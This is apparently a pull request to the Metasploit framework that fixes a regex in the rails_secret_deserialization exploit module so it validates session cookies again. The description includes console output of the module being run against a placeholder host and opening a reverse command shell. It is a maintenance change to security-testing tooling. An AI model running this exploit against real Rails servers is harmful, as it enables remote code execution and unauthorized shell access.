### PR TITLE
Fix Rails cookie regex by removing a space

### DIFF
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => datastore['HTTP_METHOD'],
     }, 25)
     if res && !res.get_cookies.empty?
-      match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
+      match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/)
     end
 
     if match


### PR DESCRIPTION
The rails_secret_deserialization exploit checks if a Rails cookie it receives is valid, matching a regular expression. Because of [a change in May last year](https://github.com/rapid7/metasploit-framework/commit/df4b832019d88c3ab4ac8209fe5072f56df03ad0#diff-3d95779b28fd9a0ca232a6e9c17db94f) in how it gets the cookie string, the regex doesn’t match valid cookies anymore.

The commit changed the source of the cookie string from `headers['Set-Cookie’]` to `res.get_cookies`, where [`Rex::Proto::Http::Response#get_cookies` strips leading and trailing whitespace from the cookie string](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/response.rb#L82).

Since the regex looks for a space at the end, and the space has been stripped out, it will fail to validate cookies correctly:

```
msf > use exploit/multi/http/rails_secret_deserialization
msf exploit(rails_secret_deserialization) > set RHOST vulnerable.example.com
RHOST => vulnerable.example.com
msf exploit(rails_secret_deserialization) > set RPORT 3000
RPORT => 3000
msf exploit(rails_secret_deserialization) > set COOKIE_NAME _vulnerable_session
COOKIE_NAME => _vulnerable_session
msf exploit(rails_secret_deserialization) > set SECRET your_super_secret_token_or_key_base
SECRET => your_super_secret_token_or_key_base
msf exploit(rails_secret_deserialization) > 
msf exploit(rails_secret_deserialization) > exploit
[*] Started reverse handler on x.x.x.x:4444 
[*] Checking for cookie _vulnerable_session
[!] Caution: Cookie not found, maybe you need to adjust TARGETURI
[-] Exploit failed [bad-config]: COOKIE not validated, unset VALIDATE_COOKIE to send the payload anyway
```

The fix is to remove the space from the end of the regex. Then it will validate cookies correctly:

```
msf exploit(rails_secret_deserialization) > exploit
[*] Started reverse handler on x.x.x.x:4444 
[*] Checking for cookie _vulnerable_session
[*] Found cookie, now checking for proper SECRET
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _vulnerable_session
[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:54997)
```
